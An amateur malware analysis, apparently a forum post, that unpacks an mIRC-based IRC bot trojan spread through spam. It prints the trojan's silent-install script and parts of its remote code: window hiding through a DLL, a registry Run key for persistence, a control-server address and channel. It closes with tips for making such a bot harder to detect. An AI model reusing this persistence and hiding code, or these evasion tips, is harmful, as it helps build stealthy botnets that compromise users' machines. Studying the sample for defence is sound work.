Ok I idle in a few channels on the Rizon IRC network. Rizon has been spammed to death latly with a botnet. So Im sitting infrunt of my machine and get bored. The spam msg promises Russin sex! I know this is just probibly a bot, but I do love my russin sex. Ok so the spam message tells me to go to the url. So I go there and right off the bat Im prompted to download movie.mpg.exe. That doesnt look like and russin porn video I've ever seen. I ignore that and look at the to pics/links of pron related material. Ooooohh theres the russin porn. I click a link. what do you know, that same exe is being surved to me. Meh, lets download'er and take a look.

So I save to my desktop and notice its just a self exstracting rar
file. So right of the bat I know these guys eather

A) Arnt that smart
B) Are lazy as hell
-They didnt even bother to pack it better or to scamble it with upx but thats another story all togeather.

Whats the best thing about these rars you ask? well simple. Right click and goto properties, then goto the comment tab. We see this.

;The comment below contains SFX script commands

Path=C:\WINDOWS\java\
SavePath
Setup=C:\WINDOWS\java\mirc.exe
Silent=1
Overwrite=2

This will tell us that there going to install to C:\windows\java and when the exe is done unpacking its going to run mirc.exe. Bingobango its a simple little mirc tojan....if only we could have seen thing comming... Ok, because its a rar file we can open it with rar right click on it again and click open with winrar.

Files in the rar!

bear.txt
Con32.dll
edih.dll
connects
mirc.exe

Right off the bat we know that this is mIRC. Mirc needs an ini file, a romte file that holds all the remote code. Click on these files and view them.

bear.txt snippit

; Set bY mC_YaRgIc ...

on *:start: {
celebili
timer12123 0 1 secret
timerasd 0 150 mC_YARGIc
mC_YARGIc
unset %*
.timer -i 1 2 NICK $_rands
.timer -i 1 2 ANICK $_rands
.timer -i 1 2 IDENTD ON $_rands
.timer -i 1 2 FULLNAME $_rands
.timer -i 1 2 EMAILADDR $_rands
.timer -i 0 60 _start
.timer -i 0 10 _reg
if $exists(up.reg) {
.remove up.reg
}

Yep, this file holds all the guys of the bot. The remote code.

Con32.dll snippet

www.klavye.com
Kenan
mkilhan
Crasus
mC_YaRgIc
4,1 --15,1 0,1K15,1a0,115,1a0,1k15,1 v44,1 --15,1 www.Kacak.net 4,1-- 
mIRC v6.03 Khaled Mardam-Bey
mIRC 6.16 Khaled Mardam-Bey
mIRC v6.15 Khaled Mardam-Bey
mIRC v6.14 Khaled Mardam-Bey
mIRC v6.12 Khaled Mardam-Bey
mIRC v6.11 Khaled Mardam-Bey
mIRC v6.1 Khaled Mardam-Bey

A version file. So if other clients ctcp version this bot they will get diffrent client version replys. Tipical.

Connects snippet

[warn]
fserve=on
dcc=off
[dirs]
logdir=....\
waves=......\
midis=......\
mp3s=......\
wmas=......\
oggs=......\
[options]
n0=0,0,0,1,0,0,300,0,0,0,1,0,0,0,2,0,0,2,0,0,4096,0,1,0,0,0,1,1,0,50,0,1
n1=5,100,0,0,0,0,0,0,2,1,0,1,0,0,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,0,0,1,1,0,120,20,10,0,1,1,0,0,1,0,0,0,0,0
n3=5000,0,0,0,0,0,1,1,0,1,0,1,0,0,0,1,3,1,0,1,0,0,0,0,1,1,0,23,0,0,1,3,180,0
n4=1,0,1,0,0,3,9999,0,0,0,1,0,1024,0,1,99,60,0,0,0,3,0,0,0,1,5000,1,5,0,0,3,0,1,1
n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,0,1,0,300,30,10,0,1,26,0,0,1,8192,1,0,0,82,0
n6=0,0,12,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,100,1,1,0,0,1,0,0,4,1,0,1
n7=0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,70,0,3,0,1,1,1,1,1,0,0,0,0,1,1,1,1

Theres our mIrc.ini file.

Edih.dll snippet

MZ?   ? @  ? !?L!This program cannot be run in DOS mode. $

????????????u????????????????????????Rich?? PE L m?< !
 [? [? F  p              K 

hmmmm this is an actuall dll file. Wounder what it does? View the contents of bear.txt
**NOTE** everything with bold after it is my description of what it does.

; Set bY mC_YaRgIc ...

on *:start: {
celebili Calls an ailias
timer12123 0 1 secret Calls an ailias every 1 second
timerasd 0 150 mC_YARGIc Calls an ailias every 2.5 miniuts
mC_YARGIc Calls an ailias
unset %* Unsets all varibles
.timer -i 1 2 NICK $_rands Timer sets the nick to something random
.timer -i 1 2 ANICK $_rands timer sets the alt nick to something random
.timer -i 1 2 IDENTD ON $_rands timer sets the identd nick to something random
.timer -i 1 2 FULLNAME $_rands timer sets the fullname to something random
.timer -i 1 2 EMAILADDR $_rands timer sets the email address to something random
.timer -i 0 60 _start Calls an ailias
.timer -i 0 10 _reg Calls an ailias
if $exists(up.reg) {
.remove up.reg Deletes up.reg
}
write up.reg REGEDIT4
write up.reg [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] Makes a reg file
write up.reg "Startup"=" $+ $nopath($mircexe) $+ "
_reg
}
on *:exit: {
run -n regedit /s up.reg When mirc closes it runs regedit to slienty (/s) run that regfile again
run $nopath($mircexe) so mirc will start again on boot.
}
on *:connect: {
if $serverip == %serverip { if/when mirc connects to the server join %join
.timer -i 1 5 JOIN %join
}
}
on *:disconnect: { part all channels and rejoin server
partall
server
}

There was alot of code here, but it was all the bot code. basicly remote commands for the 'admins' of this bot. !spam would spam, !clone would load more clones, !server would change server and stuff like that. I dont want more spam so Im not going to post all the code

alias _servmessage {
if $server {
if m isincs $chan(%join).mode && $me !isvoice %join { join channel
return
}
scid 1 .msg %join $1- join channel and hide the channel windo in mirc so the user cant see it.
}
}
alias mC_YARGIc {
scid -a window -hn "Status Window" hide the status window. So the user can see it or do anything.
}
alias celebili { .echo Kenan $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) }
alias secret { if ($appstate != hidden) { .echo hidden $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) } }
alias _start {
if !%readed {
_opensocks
}
}

The celebili code above hides mirc from the desktop. the secret code states that if the mirc isnt hidden to then hide it!

The rest of this file was just more remote code that im not going to publish.


Open up connects and look for this line. host=208.53.162.102SERVER:208.53.162.102:6667. Theres the server this bot connects

too. Lets open our IRC client and connect to it. When we connect we get irc.mkilhan.com from the MOTD (Message Of The Day - the IRC servers message) So we know that this server is mkilhan.com. Lets goto there website and take a look. Nope nothing really of any use there.
ok lets copy a mirc.exe into that C:\windows\java dir and open up the bear.txt and edit it so it doesnt do anything nasty when we connect. Im going to remove all the hidden/reg stuff and show you what it looks like when were done.

on *:start: {
unset %* .timer -i 1 2 NICK $_rands
.timer -i 1 2 ANICK $_rands
.timer -i 1 2 IDENTD ON $_rands
.timer -i 1 2 FULLNAME $_rands
.timer -i 1 2 EMAILADDR $_rands
.timer -i 0 60 _start
.timer -i 0 10 _reg


Also go down to these lines so we can edit them to what I have so we can see whats going on when we connect


alias mC_YARGIc {
echo Status Window not hidden anymore we wana see stuff
}
alias celebili { .echo celebili } [b]dont need that hide dll. and will see when that alias is called
alias secret { if ($appstate != hidden) { .echo hidden } } same as above
alias _start {
if !%readed {
echo _opensocks we dont need that. lets just open that.
}
}

Ok so now we run the mirc.exe. We connect to the network then join #intikam. Interesting. Look at all those bots, theres gotta be 100 or so. Lets whos the admins, there admins so there hostmasks are masked. Meh, we gottem anyways. Lets do a /list so we can see other channels. Theres just 4 or so. Nothing special. At this point they noticed one of there bots snooping
around there network and killed me with a kiline. Guess I'm not wanted there.

Clean up!
ok delete those files from the java dir.then open regedit and goto

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and delete the mirc entry.

Closing!

Ok this bot was simple, it would be more effective if the bot was packed better. Thus would have been a little harder to pick up but not very. Also they should have used the %windir% varable instead of C:\windows so the bout would work on more os's. They shouldnt have used there IRC nicks as aliases. After I did this expairement I whois'ed there ips and emailed the abuse account about for the subnets for boath the webhosting site and the irc network and told them about the bot. Might not do anything but still. I could have gone father and tryd to ctcp chat the admins then used netstat to find there ips. Meh, I dont really care. Im glad I got to take a look at what there doing and how all this stuff works. I hope some one finds this info usefull or entertaining. It just gos to show you that the promise of free sex on the internet is usaully just that.

One More Thing!
If you have ever talked to me you know I cant spell and my grammer sucks. I tryd to spell check with google toolbar, nothing came up. My OpenOffice isnt working as it should so there might be some spelling mistakes. FOR THIS IM SORRY!